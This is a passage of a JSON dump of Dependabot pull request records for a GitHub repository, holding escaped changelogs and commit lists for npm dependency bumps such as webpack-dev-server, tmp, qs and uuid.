Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e...\n\n_Description has been truncated_","html_url":"https://github.com/pdragy/trillium/pull/129","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/pdragy%2Ftrillium/issues/129","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/129/packages"},{"uuid":"4536768561","node_id":"PR_kwDOSGdRl87gC9Dg","number":28,"state":"closed","title":"Bump the npm_and_yarn group across 13 directories with 9 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-28T21:28:29.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-28T00:43:36.000Z","updated_at":"2026-05-28T21:28:31.000Z","time_to_close":74693,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":9,"packages":[{"name":"tmp","old_version":"0.1.0","new_version":"0.2.6","repository_url":"https://github.com/raszi/node-tmp"},{"name":"webpack-dev-server","old_version":"4.15.0","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"@tootallnate/once","old_version":"2.0.0","new_version":"2.0.1","repository_url":"https://github.com/TooTallNate/once"},{"name":"serialize-javascript","old_version":"6.0.1","new_version":"6.0.2","repository_url":"https://github.com/yahoo/serialize-javascript"},{"name":"uuid","old_version":"3.3.2","new_version":"3.4.0","repository_url":"https://github.com/uuidjs/uuid"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 5 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [tmp](https://github.com/raszi/node-tmp) | `0.1.0` | `0.2.6` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `4.15.0` | `5.2.4` |\n| [@tootallnate/once](https://github.com/TooTallNate/once) | `2.0.0` | `2.0.1` |\n| [serialize-javascript](https://github.com/yahoo/serialize-javascript) | `6.0.1` | `6.0.2` |\n| [uuid](https://github.com/uuidjs/uuid) | `3.3.2` | `3.4.0` |\n\nBumps the npm_and_yarn group with 4 updates in the /compiler directory: [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs), [@tootallnate/once](https://github.com/TooTallNate/once), [qs](https://github.com/ljharb/qs) and [axios](https://github.com/axios/axios).\nBumps the npm_and_yarn group with 2 updates in the /compiler/apps/playground directory: [axios](https://github.com/axios/axios) and [next](https://github.com/vercel/next.js).\nBumps the npm_and_yarn group with 1 update in the /fixtures/packaging/brunch/dev directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /fixtures/packaging/brunch/prod directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 2 updates in the /fixtures/packaging/webpack-alias/dev directory: [qs](https://github.com/ljharb/qs) and [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 2 updates in the /fixtures/packaging/webpack-alias/prod directory: [qs](https://github.com/ljharb/qs) and [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 2 updates in the /fixtures/packaging/webpack/dev directory: [qs](https://github.com/ljharb/qs) and [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 2 updates in the /fixtures/packaging/webpack/prod directory: [qs](https://github.com/ljharb/qs) and [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /packages/react-devtools-extensions directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /packages/react-devtools-inline directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /packages/react-devtools-shell directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /packages/react-devtools-timeline directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\n\nUpdates `tmp` from 0.1.0 to 0.2.6\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/raszi/node-tmp/blob/master/CHANGELOG.md\"\u003etmp's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.2.2 (2024-02-28)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/278\"\u003e#278\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/268\"\u003e#268\u003c/a\u003e: Revert \u0026quot;fix \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/246\"\u003e#246\u003c/a\u003e: remove any double quotes or single quotes… (\u003ca href=\"https://github.com/mbargiel\"\u003e\u003ccode\u003e@​mbargiel\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:memo: Documentation\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/279\"\u003e#279\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/266\"\u003e#266\u003c/a\u003e: move paragraph on graceful cleanup to the head of the documentation (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 5\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eCarsten Klein (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDave Nicolson (\u003ca href=\"https://github.com/dnicolson\"\u003e\u003ccode\u003e@​dnicolson\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eKARASZI István (\u003ca href=\"https://github.com/raszi\"\u003e\u003ccode\u003e@​raszi\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMaxime Bargiel (\u003ca href=\"https://github.com/mbargiel\"\u003e\u003ccode\u003e@​mbargiel\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/robertoaceves\"\u003e\u003ccode\u003e@​robertoaceves\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.2.1 (2020-04-28)\u003c/h2\u003e\n\u003ch4\u003e:rocket: Enhancement\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/252\"\u003e#252\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/250\"\u003e#250\u003c/a\u003e: introduce tmpdir option for overriding the system tmp dir (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:house: Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/253\"\u003e#253\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/191\"\u003e#191\u003c/a\u003e: generate changelog from pull requests using lerna-changelog (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eCarsten Klein (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.2.0 (2020-04-25)\u003c/h2\u003e\n\u003ch4\u003e:rocket: Enhancement\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/234\"\u003e#234\u003c/a\u003e feat: stabilize tmp for v0.2.0 release (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/231\"\u003e#231\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/230\"\u003e#230\u003c/a\u003e: regression after fix for \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/197\"\u003e#197\u003c/a\u003e (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/220\"\u003e#220\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/197\"\u003e#197\u003c/a\u003e: return sync callback when using the sync interface, otherwise return the async callback (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/193\"\u003e#193\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/192\"\u003e#192\u003c/a\u003e: tmp must not exit the process on its own (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:memo: Documentation\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/221\"\u003e#221\u003c/a\u003e Gh 206 document name option (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:house: Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/226\"\u003e#226\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/212\"\u003e#212\u003c/a\u003e: enable direct name option test (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/225\"\u003e#225\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/211\"\u003e#211\u003c/a\u003e: existing tests must clean up after themselves (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/224\"\u003e#224\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/217\"\u003e#217\u003c/a\u003e: name tests must use tmpName (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/223\"\u003e#223\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/214\"\u003e#214\u003c/a\u003e: refactor tests and lib (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/198\"\u003e#198\u003c/a\u003e Update dependencies to latest versions (\u003ca href=\"https://github.com/matsev\"\u003e\u003ccode\u003e@​matsev\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/41f71598d03f104a67e0448a7cb9bd4efcdd5980\"\u003e\u003ccode\u003e41f7159\u003c/code\u003e\u003c/a\u003e Bump up the version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/efa4a06f24374797ae32ab2b6ae39b7a611ae429\"\u003e\u003ccode\u003eefa4a06\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/7ef2728ce0211b8110b2033dfe62eaf030341acf\"\u003e\u003ccode\u003e7ef2728\u003c/code\u003e\u003c/a\u003e Check for relative values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/3d2fe387f3f91b13830b9182faa02c3231ea8258\"\u003e\u003ccode\u003e3d2fe38\u003c/code\u003e\u003c/a\u003e Bump up the version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/e16282879e5d0554fe824e1ab3df724847e91183\"\u003e\u003ccode\u003ee162828\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/309\"\u003e#309\u003c/a\u003e from fflorent/fix-tmp-dir-with-dir\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/b847d2f1a42b625c26149f4a2029ed00a1edf90b\"\u003e\u003ccode\u003eb847d2f\u003c/code\u003e\u003c/a\u003e Fix use of tmp.dir() with \u003ccode\u003edir\u003c/code\u003e option\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/08fa3abac32b621506512724b28b56b9c4a95846\"\u003e\u003ccode\u003e08fa3ab\u003c/code\u003e\u003c/a\u003e Update version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/1cf4ec54180a77a2a95dc1941efa1659774c8787\"\u003e\u003ccode\u003e1cf4ec5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b\"\u003e\u003ccode\u003e188b25e\u003c/code\u003e\u003c/a\u003e Fix GHSA-52f5-9888-hmc6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/73b9fe45bbb40157acdfab8126dd0911de91c8fa\"\u003e\u003ccode\u003e73b9fe4\u003c/code\u003e\u003c/a\u003e Add test case for GHSA-52f5-9888-hmc6\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/raszi/node-tmp/compare/v0.1.0...v0.2.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 4.15.0 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header 